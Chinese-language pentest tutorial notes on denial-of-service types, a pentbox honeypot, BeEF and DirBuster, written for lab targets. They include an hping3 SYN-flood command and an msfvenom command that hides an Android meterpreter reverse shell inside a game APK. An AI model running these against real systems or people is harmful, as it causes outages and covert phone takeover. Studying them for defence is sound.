使用某些手段故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击。实际上拒绝服务攻击并不是一个攻击方式,它是一类具有相似特征的攻击方式的集合。拒绝服务攻击有以下分类:
1. 数据链路层的拒绝服务攻击
攻击目标:交换机
集线器:以前的内网都是用集线器,集线器不具备“学习”和“记忆”功能,多台机器在通信的时候,都是将信息发给所有的机器,如果不是对应的机器接收到,就不做应答。它的缺点是,我们可以很简单的获取到整个网络内的所有信息。
交换机:交换机有学习和记忆的功能,在交换机内部有一个CAM的表,这个表可以记录交换机每个接口对应的计算机的MAC地址信息,有了这些信息,在传输数据的时候就可以一对一传输。
拒绝服务攻击利用方法:CAM表容量有限,如果我们在短时间内制造大量的不同源的MAC地址发来的数据包,CAM表就会被占满,导致交换机无法正常工作。
2.网络层的拒绝服务攻击
TCP和UDP就位于这一层,而基于TCP的拒绝服务攻击,就是大家常说的拒绝服务攻击。大部分的服务器都是提供HTTP服务的服务器,HTTP协议就是TCP提供的支持。基于TCP的拒绝服务攻击有两种:
利用工具:hping3。实验靶机:Metasploitable2。
命令:hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source [目标ip]
3.传输层的拒绝服务攻击
4.基于应用层的拒绝服务攻击
5.DDOS攻击
大家常说的DDOS攻击,翻译过来就是分布式拒绝服务攻击,也就是很多的机器同时对目标发起拒绝服务攻击,这就是为什么DDOS往往和肉鸡这个词一起出现的原因。
什么是蜜罐?许多安全专家都喜欢的一个东西就是蜜罐。简单地说,蜜罐是模拟特定网络攻击目标的系统。有了蜜罐,管理员可以检测并记录对某些服务发起的网络攻击,以及发起攻击的IP地址。建立一个蜜罐是相当简单的,使用Kali Linux和pentbox组合,可以在几分钟内启动和运行一个蜜罐。
可以使用以下命令下载蜜罐:
wget http://downloads.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz
运行pentbox Ruby脚本:
./pentbox.rb
然后会看到一个菜单,在菜单中选择2(用于网络工具),然后选择3(用于蜜罐)。
然后会让你选择快捷设置还是手动设置,如果快捷设置报错了,那么可以使用手动设置,比如端口被占用等。
然后可以用另外一台电脑来访问该kali的ip地址,别忘了加端口号。
然后就没有然后了。
Nessus是目前全世界最多人使用的系统漏洞扫描和分析工具。
暂不介绍,自行百度。
Apache是世界使用排名第一的web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。
运行一个网站,可以作为文件上传下载的中转站。其实咱们之前都玩过了。
启动apache服务:sudo service apache2 start。
实践步骤:
把这段js脚本代码,放到如下图所示即可,注意,看到下面红框里的<IP>没有?改成你的主机IP,就完事了。
默认的用户名就是beef,密码就是刚才你设置的:
就进来了。
所以!不要轻易扫码!!!
1.首先我下载了一个游戏,你自己随便下载。
2.在app中植入payload。啥意思不说了哈,都知道了。
sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.199.124 lport=6666 -x /home/zakingwong/game_old.apk R>/home/zakingwong/new.apk
3.然后开启主控端,进入meterpreter。
4.通过apache把apl发送到你的安卓手机上。
5.安装并打开游戏。
6.然后,做之前学过的事吧!
要相对一个目标站点做渗透测试,首先要搞清楚的就是目标的目录结构。这个任务可以交给DirBuster来做。DirBuster是一个多线程Java应用程序,可以破解Web应用程序服务器上的目录和文件名。DirBuster自带字典文件,当然我们可以根据收集到的其他信息,针对性的生成更加好用的字典文件。
使用方法,要想使用DirBuster只需要简单的四部操作,实验靶机是owasp linux服务器: